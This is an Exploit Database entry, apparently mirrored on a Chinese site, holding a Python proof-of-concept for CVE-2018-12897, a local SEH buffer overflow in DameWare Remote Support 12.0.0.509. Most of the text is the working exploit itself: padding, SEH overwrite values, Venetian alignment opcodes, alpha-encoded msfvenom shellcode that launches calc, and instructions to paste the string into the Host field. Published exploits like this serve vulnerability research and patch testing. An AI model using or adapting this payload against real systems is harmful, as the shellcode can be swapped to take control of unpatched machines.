DameWare Remote Support 12.0.0.509 – ‘Host’ Buffer Overflow (SEH)

• Exploit Database
• 113 阅读

• 作者： Xavi Beltran
  日期： 2019-07-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47126/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

  #!/usr/bin/env python # Author: Xavi Beltran # Date: 11/07/2019 # Description: # SEH based Buffer Overflow # DameWare Remote Support V. 12.0.0.509 # CVE-2018-12897   # Contact: xavibeltran@protonmail.com # Webpage: https://xavibel.com # Tested on: Windows XP SP3 ESP   # Credit for Adam Jeffreys from Nettitude! :)   # Usage: # Right click on a host >> AMT >> AMT Settings dialog # Mark "Use SOCKS proxy" box # Paste the string in the Host field   junk= "\x41" * 1672   # Unicode compatible padding nseh = "\x61\x43"   # 007A007B - POP POP RET seh = "\x7B\x7A"   align= "" align += "\x05\x20\x11" # add eax,0x11002000 align += "\x71" # Venetian Padding align += "\x2d\x19\x11" # sub eax,0x11001900 align += "\x71" # Venetian Padding align += "\x50" # push eax align += "\x71" # Venetian Padding align += "\xC3" # RETN   padding = "\x41" * 11   junk2 = "\x41" * 870 junk3 = "\x41" * 2014   # msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw # ./alpha2 eax --unicode --uppercase < shellcode.raw # 508 bytes shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"     crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3   print(crash)